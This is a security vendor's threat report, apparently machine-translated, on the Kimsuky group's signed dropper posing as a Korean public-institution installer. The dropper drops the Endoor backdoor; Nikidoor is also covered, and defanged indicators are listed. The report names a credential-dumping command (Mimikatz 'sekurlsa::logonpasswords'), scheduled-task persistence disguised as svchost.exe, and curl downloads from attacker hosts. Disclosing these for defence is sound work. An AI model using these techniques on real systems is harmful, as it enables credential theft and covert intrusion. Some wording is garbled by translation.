AhnLab SEcurity intelligence Center (ASEC) recently confirmed that the Kimsuky group distributed malware disguised as an installer for domestic public institutions. The malware in question is a dropper, which creates Endoor , a backdoor malware used in the attack discussed in the past article “TrollAgent (Kimsuky group) infected during security program installation” [1] .
Although the history of the dropper malware being used in actual attacks has not been confirmed, cases of attacks using backdoor malware generated by the dropper were confirmed at a time similar to the collection date of the dropper malware. Attackers used backdoors to download additional malware or install malware that steals screenshots. Endoor is also continuously used in attacks, and has been used in the past along with Nikidoor , which has been distributed as a spear phishing attack.
1. Dropper disguised as an installation file for a domestic public institution
The dropper malware was disguised as an installation file for a specific public institution in Korea. The icon was used as the logo of the relevant public institution, and related keywords can be found on the version information or installation page. For reference, since normal programs with the same version information are not confirmed, it may be that the program was not disguised as an existing program but simply made to appear as a normal program. Also, during the actual installation process, there are no normally installed programs except for malicious code.
The dropper is characterized by not only disguising version information, but also signing with a valid certificate from a domestic company. When the dropper is executed, it creates an internal compressed file called “src.rar” and a WinRAR tool named “unrar.exe”. Afterwards, using WinRAR, give the password “1q2w3e4r”, unzip the file, create a backdoor, and execute it.
2.Endoor backdoor
The dropper executes a backdoor by giving “install” as an argument. The backdoor executed with that argument copies itself to the “%USERPROFILE%\svchost.exe” path and registers itself in the task scheduler under the name “Windows Backup.” The task scheduler executes the backdoor with the “backup” argument, and the backdoor can then connect to the C&C server and receive commands.
The backdoor was developed in the Go language and, although obfuscated, is the same type identified in the previous case. In the past, in the post “TrollAgent (Kimsuky group) infected during security program installation”, it was signed and distributed with the same certificate as TrollAgent, and contains the following keywords, so it is classified as Endoor here.
Endoor is a backdoor malware that transmits basic information of the infected system and supports functions such as command execution, file upload and download, process operation, and Socks5 proxy. In the past, China’s QiAnXin’s Threat Intelligence Center did not classify the malware separately, but disclosed detailed analysis information. [2]
3. Attack Case #1
Although it is not confirmed whether it was installed through the dropper discussed above or through another path, the history of Endoor being used in attacks has been confirmed in the ASD infrastructure. The following log is believed to be the Kimsuky group updating Endoor with a different binary. It was downloaded externally using Curl under the name “rdpclip.dat”, and the file was not confirmed, but judging from the fact that the “install” argument was used when running and the file size, it is presumed to be a different version of Endoor.
The attacker also installed and used Mimikatsu in the “%ALLUSERSPROFILE%\cache.exe” path, and the “sekurlsa::logonpasswords” argument was confirmed in the execution log as follows.
Among the installed malware, there is also malware that captures and steals screenshots of the infected system. The malware was created using Kbinani’s screenshot library [3], and the attacker implemented a function to not only capture screenshots but also leak them. The stolen address is the local host, “hxxp://127.0.0.1:8080/recv”, and it appears that the attacker has already installed a proxy on the infected system and is using it to steal it externally.
4. Attack Case #2 (Nikidoor)
Endoor, which has been confirmed recently, is characterized by using Ngrok’s free domain address “ngrok-free[.]app” as its C&C server. After the above case confirmed in February 2024, Endoor, which was additionally confirmed in March 2024, also used the same “install” and “backup” arguments and “ngrok-free[.]app” as the C&C server.
For reference, the above address was also used to spread Nikidoor, and the C&C server address is also shared. Nikidoor is a backdoor malware from the Kimsuky group mentioned in the post “Kimsuky targets domestic research institutes by disguising import declarations” [4]. Like other malware such as AppleSeed and Endoor, it steals information from the infected system and receives commands to become malicious. Actions can be performed. A characteristic feature is that the string “Niki” is continuously used in the PDB path string.
- PDB path : C:\Users\niki\Downloads\Troy\Dll.._Bin\Dll.pdb
5. Conclusion
Recently, cases of the Kimsuky group signing and distributing malware using valid certificates from domestic companies have been continuously confirmed. The attacker ultimately installs backdoor malware and can use it to steal user information existing in the infected system.
Users should update V3 to the latest version to prevent malware infection in advance.
File Diagnostics
– Dropper/Win.Endoor.C5593202 (2024.02.25.01)
– Backdoor/Win.Endoor.C5593201 (2024.02.25.01)
– Backdoor/Win.KimGoBack.C5385331 (2024.02.20.03)
– Backdoor/Win.Endoor.C5598434 ( 2024.03.09.00)
– Backdoor/Win.Nikidoor.C5598774 (2024.03.10.00)
Behavioral Diagnosis
– Execution/MDP.Event.M18
IoC
MD5
– b74efd8470206a20175d723c14c2e872 : Dropper – Signed with normal certificate (*App.exe)
– 7034268d1c52539ea0cd48fd33ae43c4 : Endoor (svchost.exe)
– f03618281092b02589bca833f674e8 a0: Screenshot hijacking (ag.dat)
– b8ffb0b5bc3c66b7f1b0ec5cc4aadafc: Endoor – Additional confirmation (eng.db)
– 7beaf468765b2f1f346d43115c894d4b: Nikidoor (c.pdf)
C&C Address
– hxxps://real-joey-nicely.ngrok-free[.]app/mir/index.php : Endoor
– hxxps://fitting-discrete-lemur.ngrok-free[.]app/minish/index .php : Endoor – Additional Verification
– hxxp://minish.wiki[.]gd/index.php : Endoor – Additional Verification, Nikidoor
– hxxp://minish.wiki[.]gd/upload.php : Nikidoor
Download address
– hxxp://210.16.120[.]210/rdpclip.dat : Endoor estimated download
– hxxp://minish.wiki[.]gd/eng.db : Endoor – additional confirmation
– hxxp://minish. wiki[.]gd/c.pdf: Nikidoor